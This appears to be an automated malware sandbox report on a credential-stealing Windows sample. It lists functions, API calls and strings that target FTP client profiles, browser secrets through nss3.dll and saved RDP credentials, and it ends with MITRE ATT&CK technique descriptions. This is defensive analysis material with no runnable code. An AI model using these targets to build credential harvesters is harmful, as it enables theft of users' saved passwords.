Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 788b682c2aacaeba675ba1e794ec048645995e3248955f3ef26a6c41f5091c1a
Instruction ID: 63f6a582a31ca3e0dd9f1a5c6312de0303cffdcfdb84ee9d096ffaea876654e5
Opcode Fuzzy Hash: 788b682c2aacaeba675ba1e794ec048645995e3248955f3ef26a6c41f5091c1a
Instruction Fuzzy Hash: EA01F5B1500606BAEB112731DD02FEF3A599B91324F24813FF898B51E2EB7C1A8182DC

Function 0040FE31 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?,0040FE4B), ref: 0040FE5B
GlobalLock.KERNEL32(?), ref: 0040FE7C
GlobalUnlock.KERNEL32(?), ref: 0040FE94
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FE4B), ref: 0040FEAF

Strings

STATUS-IMPORT-OK, xrefs: 0040FEA7

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$FromLockStreamUnlock
String ID: STATUS-IMPORT-OK
API String ID: 2287449323-1591331578
Opcode ID: ba4b5c9f78cce44668a517f99baab74ff39a9ca6980be9040cdda160361d9401
Instruction ID: fd286837766a8a9240475fc2ea522612fe4cadf4428e7323ec020fd49669a328
Opcode Fuzzy Hash: ba4b5c9f78cce44668a517f99baab74ff39a9ca6980be9040cdda160361d9401
Instruction Fuzzy Hash: C9016172A14248BBCF126BB1CC4299E7B76DF01308F1480BBB410B54B3DA7D9A95DA58

Function 00402469 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

lstrlenA.KERNEL32(?), ref: 0040247D
StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Strings

.exe, xrefs: 00402496

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: ace233f8ca1625aa5691f84f09ce995b372257633a6f05252a680a3774831c5a
Instruction ID: bfd6875b47a2cc1e20eba2977a61168174313ec8c059100834985ed10b07fdd8
Opcode Fuzzy Hash: ace233f8ca1625aa5691f84f09ce995b372257633a6f05252a680a3774831c5a
Instruction Fuzzy Hash: 19F0C83160828578DB226225CC09FAF7E859B92795F280077F514AA2C2D7FC9881926D

Function 0040E8F8 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

<_OP3_Password2, xrefs: 0040E974

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: <_OP3_Password2
API String ID: 0-4172175086
Opcode ID: 25812717ef707eae2ae4c8ea79630e572756801a93e9bfb41c838885812c8dcc
Instruction ID: d612185a7ae8ddbcfc4e81528d8c685fb532cb6270b3aecff53feb4812be29f4
Opcode Fuzzy Hash: 25812717ef707eae2ae4c8ea79630e572756801a93e9bfb41c838885812c8dcc
Instruction Fuzzy Hash: 33419D72900009FECF12ABA2DC019EE7E72AF58314F144477F510B51A1D73D8E61DB69

Function 0040D029 Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D059
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040D07F
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0A3
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0C5

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040D0B0

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 7c1ddf97d11231fc6f9719559a9c2a6d6c756f456982bcddd4f27ae86e8f830d
Instruction ID: 50cffe499a2c34a400854f72f514bb2440c9afb9d1d98cf658c0f101d2fa3403
Opcode Fuzzy Hash: 7c1ddf97d11231fc6f9719559a9c2a6d6c756f456982bcddd4f27ae86e8f830d
Instruction Fuzzy Hash: 86214CB2D44208BEEF216BE1CC02F9E7E74AF10318F20806AF115B91E1D6BD5A919B18

Function 00405E7E Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00541FA8,FTP Navigator), ref: 00405EAC
StrStrIA.SHLWAPI(00541FA8,FTP Commander,00541FA8,FTP Navigator), ref: 00405EDA

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

ftplist.txt, xrefs: 00405EC1, 00405EEF
FTP Navigator, xrefs: 00405EA6
FTP Commander, xrefs: 00405ED4

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: FTP Commander$FTP Navigator$ftplist.txt
API String ID: 1884169789-2424314702
Opcode ID: 408c8dbacc7ca950034744205d7c8e270d7fd61b2b0d675d7d05c429344d31a7
Instruction ID: 37272958ca72b37d3f7b8cc0c50ac0d482ab522f8c39d3d7ffd2998172c17a04
Opcode Fuzzy Hash: 408c8dbacc7ca950034744205d7c8e270d7fd61b2b0d675d7d05c429344d31a7
Instruction Fuzzy Hash: A60108B15005067ADB113731CC02FAF3A18EF81318F24803BB510B11E2DBBC5E819AEC

Function 0040D2AE Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00542E18,FTPNow), ref: 0040D2D5
StrStrIA.SHLWAPI(00542E18,FTP Now,00542E18,FTPNow), ref: 0040D2E6

Strings

sites.xml, xrefs: 0040D2FF
FTP Now, xrefs: 0040D2E0
FTPNow, xrefs: 0040D2CF

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: FTP Now$FTPNow$sites.xml
API String ID: 0-284577462
Opcode ID: a3ca3d5c4a3b2b8510dee4d94e9884ca803d34a407db987cda011ab10b367688
Instruction ID: 3ec6e7a9122d4db8382e3876f21d9f9689c3d7025df328ec6a69311aaec69a26
Opcode Fuzzy Hash: a3ca3d5c4a3b2b8510dee4d94e9884ca803d34a407db987cda011ab10b367688
Instruction Fuzzy Hash: 9BF0F4B590010176DB212BB48C03FBF3A568B92754F28413BB910B12E3EBBDDE91925D

Function 0040C845 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C865
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C887
StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C89B

Strings

Settings, xrefs: 0040C8B8

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: 9f6b67f5e02b164fb478122a98204d74f34fcf19fb9127d3e142759181cd1ed9
Instruction ID: 66fdbea4ebbab1985e0bd365db80c5e4d625af8f0380fa5ef8b59165c94ce83d
Opcode Fuzzy Hash: 9f6b67f5e02b164fb478122a98204d74f34fcf19fb9127d3e142759181cd1ed9
Instruction Fuzzy Hash: CD311E31A4020AFBDF11AF91CC42FDEBB72AF44744F208176B620791F1D7755A51AB58

Function 00408830 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

http://, xrefs: 00408885
https://, xrefs: 00408896

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: 56b7a2f3b57d12a53a10b98ac0129a4b2a238f1f9158c5a5933ce5d698a738a4
Instruction ID: 10dabf40450e44178f33ec249889296fb841353c0e9ad22b317d2de01f524ca7
Opcode Fuzzy Hash: 56b7a2f3b57d12a53a10b98ac0129a4b2a238f1f9158c5a5933ce5d698a738a4
Instruction Fuzzy Hash: 1E412A31810109FADF12BF91CD05BEE7B72AF40318F50807AB491351F1DB7A5AA0EB59

Function 00401B28 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00401B32
GetHGlobalFromStream.OLE32(?,?), ref: 00401B4B
GlobalLock.KERNEL32(?), ref: 00401B66

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

GlobalUnlock.KERNEL32(?), ref: 00401B8E

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
String ID:
API String ID: 1884134869-0
Opcode ID: 102ff5740556d289dc569bf70e42cc8854418f5872dd2683080fa1c2e952d023
Instruction ID: ff5a7e9a5442a4ed85009e21393d30accebdb174d392cd4e994c245d6b766a7c
Opcode Fuzzy Hash: 102ff5740556d289dc569bf70e42cc8854418f5872dd2683080fa1c2e952d023
Instruction Fuzzy Hash: A421B87690020DBBDF02AFE1CC82DDDBB75AF04348F0040BAB615B50B1DB799B959B58

Function 0040CEE7 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613

StrStrIA.SHLWAPI(?,00416144), ref: 0040CF26
lstrlenA.KERNEL32(TERMSRV/,?,00416144), ref: 0040CF34
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00416144), ref: 0040CF44

Strings

TERMSRV/, xrefs: 0040CF2F, 0040CF3C

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: e7c6d292ac75772df7a407141648a7ce6ac9a4609a9c1acb67da7efe31f585d2
Instruction ID: 56d9c26654d81067f07aa167816c22782833b7b2e80897679c0056a5e51c6480
Opcode Fuzzy Hash: e7c6d292ac75772df7a407141648a7ce6ac9a4609a9c1acb67da7efe31f585d2
Instruction Fuzzy Hash: 8511DA31410109FBCF126F61CC429DE3E32AF54399F144526B925791F2D77ADAA1AB88

Function 00401E88 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401EA9
lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: afd82815c8c99cdaeefa24fc75ffa890a2982f6f5c1c001fce2fa764d9baefb3
Instruction ID: ca77cd74d2a533e6ebf082bb26d92fc69d9dac365f3726b13707cc28114e5187
Opcode Fuzzy Hash: afd82815c8c99cdaeefa24fc75ffa890a2982f6f5c1c001fce2fa764d9baefb3
Instruction Fuzzy Hash: 54F012B1500208BFCF11AF61CC859DD3BA8AF2439CF00C43BBC0918162D7BD89D48B88

Function 00409329 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040933C
SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040935D

Strings

nss3.dll, xrefs: 00409367

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 8159e891e3e9b5010d482309a0aa0b8622a4278e766383ae9c9b589065a62e3d
Instruction ID: 3dbaa2c37eb9edeac60df4c98f539187ff96b7e476cc496900b0400eb7fd0e01
Opcode Fuzzy Hash: 8159e891e3e9b5010d482309a0aa0b8622a4278e766383ae9c9b589065a62e3d
Instruction Fuzzy Hash: 58115E71611A04EFD7113F60ED097CA3BA3BB95355F248036F847E42E1D7B94DA48A4E

Function 0040CF98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CFD7
CredFree.ADVAPI32(00000000), ref: 0040D01E

Strings

TERMSRV/*, xrefs: 0040CFD2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: a599282d23594c5ea52c5ecc8fafc165b728aef28e1290e5b66d6eb2e80e641b
Instruction ID: bbd0f44d2efdce0af323f0fe118246b392c9dfa6248d013bbb57161547d8bba6
Opcode Fuzzy Hash: a599282d23594c5ea52c5ecc8fafc165b728aef28e1290e5b66d6eb2e80e641b
Instruction Fuzzy Hash: 73110931801604EBDF31CF88D909BEAB7F5AB14309F14407BD645711E0C779AA99EB99

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
